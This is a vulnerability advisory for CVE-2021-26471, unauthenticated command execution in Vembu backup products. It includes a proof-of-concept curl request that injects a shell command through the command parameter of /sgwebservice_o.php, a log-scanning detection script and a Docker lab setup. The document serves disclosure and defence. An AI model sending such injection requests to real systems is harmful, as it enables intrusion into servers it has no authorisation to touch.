CVE-2021-26471
Unauthenticated remote command execution in Vembu products
CVE | CVE-2021-26471 |
Title | Unauthenticated remote command execution in Vembu products |
Case | DIVD-2020-00011 |
Credits |
|
CVSS | |
References |
|
Problem type(s) | n/a |
Date published | 07 Jul 2021 00:00 CEST |
Last modified | 04 Feb 2022 22:33 CET |
Description
In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1, the HTTP API located at /sgwebservice_o.php accepts a command argument. Using this command argument, an unauthenticated attacker can execute arbitrary shell commands.
How to reproduce
Step 1: Start up a Docker environment (see below)
Step 2: In a different terminal run the following command:
$ curl 'http://127.0.0.1:6060/sgwebservice_o.php?Action=StoreSpecialFolder&command=echo%20hacked%20%3E%2Ftmp%2Fdivd_was_here.txt&tempFile=/tmp'
<storegrid><saved messsage='Files filtered and cached successfully.Now You can continue your schedule..' error='0'></saved></storegrid>$
Step 3: Validate that a file was written in /tmp:
$ docker exec VembuBDR4201 /bin/bash -c "ls -l /tmp;echo ---;cat /tmp/divd_was_here.txt;echo ---"
total 16
-rw-r--r-- 1 www-data www-data 7 Feb 11 15:00 divd_was_here.txt
drwxr-xr-x 1 root root 4096 Feb 11 14:52 hsperfdata_root
drwxr-xr-x 1 root root 4096 Feb 11 14:52 vmware
drwx------ 2 root root 4096 Jun 12 2020 vmware-root
---
hacked
---
$
Impact
This vulnerability allows an attacker to execute an arbitrary (Windows/Linux) shell command in the context of the httpd process.
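One way to review web server access logs for requests that reach this endpoint, added here as an example and not part of the original advisory. It assumes Apache/nginx "combined" log format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/sgwebservice_o.php"  # API path named in the advisory

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def find_endpoint_requests(lines):
    """Return a finding for every logged request that reaches ENDPOINT.

    'command' holds the URL-decoded value of the command argument when it
    was sent in the query string, else None (for example when it was sent
    in a POST body, which access logs do not record).
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Decode and lowercase the path so %-encoding or case changes do not hide it.
        if ENDPOINT not in unquote(url.path).lower():
            continue
        params = {k.lower(): v for k, v in
                  parse_qs(url.query, keep_blank_values=True).items()}
        findings.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"],
            "status": int(m["status"]),
            "command": params.get("command", [None])[0],
        })
    return findings

# Constructed sample lines (not real traffic); the second mirrors the
# request shown under "How to reproduce".
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Feb/2021:14:58:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Feb/2021:15:00:12 +0000] "GET /sgwebservice_o.php?Action=StoreSpecialFolder&command=echo%20hacked%20%3E%2Ftmp%2Fdivd_was_here.txt&tempFile=/tmp HTTP/1.1" 200 140 "-" "curl/7.64.1"',
    '198.51.100.7 - - [11/Feb/2021:15:01:40 +0000] "POST /SGWebService_o.php HTTP/1.1" 200 140 "-" "curl/7.64.1"',
    '203.0.113.5 - - [11/Feb/2021:15:02:03 +0000] "GET /%73gwebservice_o.php?command=echo%20hacked HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_endpoint_requests(SAMPLE_LOG):
        print(finding)
```

A hit with no command value still deserves a look at the source address and timing, since the argument may have been sent in a request body that the access log does not record.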
About the Docker test environment
In order to set up the docker test environment, we used the following script:
#!/bin/bash

# Network: create it only if it does not exist yet
if [[ $(docker network ls | grep vembu-network | wc -l) -lt 1 ]]; then
    docker network create --subnet=172.18.0.0/16 vembu-network
fi

# Start Database container (remove any previous instance first)
mkdir -p DB
while [[ $(docker ps -a | grep VembuDatabase | wc -l) -ge 1 ]]; do
    docker kill VembuDatabase
    docker rm VembuDatabase
    sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v "$PWD/DB:/vembu" vembubdr/bdr-latest:psql-latest

# Wait for database port to open
echo -n "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432"; do
    echo -n "."
    sleep 1
done
echo

# Start APP container (remove any previous instance first)
mkdir -p APP
while [[ $(docker ps -a | grep VembuBDR4201 | wc -l) -ge 1 ]]; do
    docker kill VembuBDR4201
    docker rm VembuBDR4201
    sleep 1
done
docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse -p 6060:6060 -p 32004:32004 -v "$PWD/APP:/vembu" vembubdr/bdr-latest:vembubdr-4201-u1

# Wait for app port to open
echo -n "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060"; do
    echo -n "."
    sleep 1
done
echo